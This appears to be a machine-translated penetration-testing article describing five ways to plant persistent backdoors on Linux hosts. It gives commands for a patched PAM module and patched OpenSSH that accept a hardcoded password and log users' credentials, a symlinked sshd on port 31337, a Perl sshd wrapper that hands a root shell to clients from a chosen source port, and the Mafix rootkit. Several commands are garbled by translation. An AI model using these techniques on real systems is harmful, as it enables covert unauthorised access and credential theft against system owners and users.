N backdoors in Linux

N backdoors in Linux

Preface

During penetration testing, we often encounter various types of Linux system hosts. Today, we will make a summary and discussion about the several backdoors in linux.

Pose 1. PAM Backdoor

Overview:

PAM (Pluggable AuthenticationModules) is an authentication mechanism proposed by Sun. It provides dynamic link libraries and a set of unified APIs to separate the services provided by the system from the authentication methods of the service, this allows the system administrator to flexibly configure different authentication methods for different services as needed without changing the service program. It is also convenient to add new authentication methods to the system. PAM was originally integrated in Solaris and has been ported to other systems such as Linux, SunOS, HP-UX9.0, etc.

The main idea of building a PAM backdoor is to install pam_unix_auth.c in a patch to the normal PAM module.
 

Procedure:

1. Obtain the PAM version used by the target system:

Rpm-qa | grep pam

2. Compile and install PAM

3. compile and generate the local pam_unix_auth.c file by patching.

4. The compiled file is in modules/pam_unix/. libs/pam_unix.so. The backdoor password is root123 and the root logon password is recorded in/tmp/pslog.

Features:
Advantage: relatively concealed and hard to be discovered.
Disadvantage: compiling environment is required. problems may occur if GCC or other dependent packages are missing.

Pose 2. openssh Backdoor

Overview:

Idea: download the new version of openssh and the corresponding patch package. This patch file contains sshbd5.9p1. the diff file is a backdoor file, which includes auth. c. auth-pam.c, auth-passwd.c, canohost. c. Des. h. log. c. servconf. c, sshconnect2.c, sshlogin. c. version. h

# Tar-zxvf openssh-5.9p1.tar.gz

# Tar-zxvf 0x06-openssh-5.9p1.patch.tar.gz

Vim mongodes. h // modify the backdoor password and record the file location,

/*

# Define ILOG "/tmp/ilog" // record the user name and password used to log on to the Local Machine

# Define OLOG "/tmp/olog" // record the user name and password used to log on to the remote machine

# Define SECRETPW "root123" // your backdoor password

*/

 

Advantage: relatively concealed and hard to be discovered.
Disadvantage: the compiling environment is required. problems may occur if GCC or other dependent packages are missing.

Pose 3. quick access to ssh Backdoors

Overview:

Run the following command on the remote host:

# Ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort = 31337;

A port 31337 is derived and connected to port 31337. Use root/bin/ftp/mail as the user name and password to log on.

:

 

Features:

Advantage: relatively weak concealment, suitable for short-term connections.
Disadvantage: It will be disconnected after restart and cannot be connected.

Pose 4. SSH wrapper Backdoor

Overview:

Init starts/usr/sbin/sshd first. When the script runs to getpeername, the regular expression matching fails. Therefore, run the following statement to start/usr/bin/sshd, this is the original sshd. After a tcp connection is established on the original sshd listening port, a sub-process fork will process the specific work. This sub-process has no tests, but directly executes the/usr/sbin/sshd at the default position of the system, so that the control is returned to the script. At this time, the standard input and output of the sub-process have been redirected to the socket. getpeername can actually get the TCP source port of the client. If it is 19526, execute sh to a shell.

Client:
[Root @ localhost ~] # Cd/usr/sbin

[Root @ localhost sbin] # mv sshd ../bin

[Root @ localhost sbin] # echo '#! /Usr/bin/perl '> sshd

[Root @ localhost sbin] # echo 'exec "/bin/sh" if (getpeername (STDIN) = ~ /^ .. 4A/); '> sshd

[Root @ localhost sbin] # echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd", @ ARGV, '> sshd

[Root @ localhost sbin] # chmod u + x sshd

[Root @ localhost sbin] #/etc/init. d/sshd restart

Control end:
Socat STDIOTCP4: target_ip: 22, sourceport = 19526

Features:

Advantage: It is highly concealed and requires no compilation. It is used in most environments.
Disadvantage: You need to restart the sshd process.

Pose 5: Use mafix rootkit to create a backdoor

Overview: Mafix is a common lightweight application-level Rootkits. It allows remote login by forging an ssh protocol vulnerability. It features simple configuration and can customize verification passwords and port numbers.

After the installation is complete, use the port configured by the ssh user @ IP-P to log on remotely.

Features:

Advantage: General concealment, no need to compile.
Disadvantage: ls and other commands are replaced, which is easy to recognize.